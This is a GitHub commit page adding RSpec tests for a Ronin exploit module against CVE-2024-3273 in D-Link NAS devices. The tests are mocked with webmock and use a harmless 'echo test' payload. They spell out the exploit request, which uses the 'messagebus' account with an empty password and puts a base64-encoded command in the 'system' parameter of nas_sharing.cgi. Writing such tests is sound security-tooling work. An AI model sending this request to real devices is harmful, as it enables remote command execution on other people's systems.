Skip to content

Commit

Permalink
Added specs for CVE_2024_3273#launch.
Browse files Browse the repository at this point in the history
  • Loading branch information
postmodern committed Aug 5, 2024
1 parent 9dcc42e commit 9e0f202
Show file tree
Hide file tree
Showing 2 changed files with 46 additions and 1 deletion.
1 change: 1 addition & 0 deletions Gemfile
Original file line number Diff line number Diff line change
Expand Up @@ -10,6 +10,7 @@ group :development do
gem 'rake', require: false

gem 'rspec', '~> 3.0', require: false
gem 'webmock', '~> 3.0', require: false
gem 'simplecov', '~> 0.20'

gem 'redcarpet', platform: :mri
Expand Down
46 changes: 45 additions & 1 deletion spec/exploits/d-link/CVE-2024-3273_spec.rb
Original file line number Diff line number Diff line change
@@ -1,6 +1,50 @@
require 'spec_helper'
require './exploits/d-link/CVE-2024-3273'

require 'webmock/rspec'

describe Ronin::Exploits::CVE_2024_3273 do
it "#launch"
let(:base_url) { 'https://example.com' }
let(:payload) { "echo test" }

subject do
described_class.new(
params: {base_url: base_url},
payload: payload
)
end

describe "#launch" do
let(:base64_command) { payload.base64_encode(mode: :url_safe) }

it "must send a HTTP GET request for '/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=BASE64_ENCODED_COMMAND'" do
stub_request(:get, "#{base_url}/cgi-bin/nas_sharing.cgi").with(query: {
user: 'messagebus',
passwd: '',
cmd: '15',
system: base64_command
})

subject.launch
end

context "when the HTTP response status is not 200" do
let(:status) { 404 }

before do
stub_request(:get, "#{base_url}/cgi-bin/nas_sharing.cgi").with(query: {
user: 'messagebus',
passwd: '',
cmd: '15',
system: payload.base64_encode(mode: :url_safe)
}).to_return(status: status)
end

it do
expect {
subject.launch
}.to raise_error(Ronin::Exploits::ExploitFailed,"GET #{base_url}/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=#{base64_command} returned HTTP #{status}")
end
end
end
end

0 comments on commit 9e0f202

Please sign in to comment.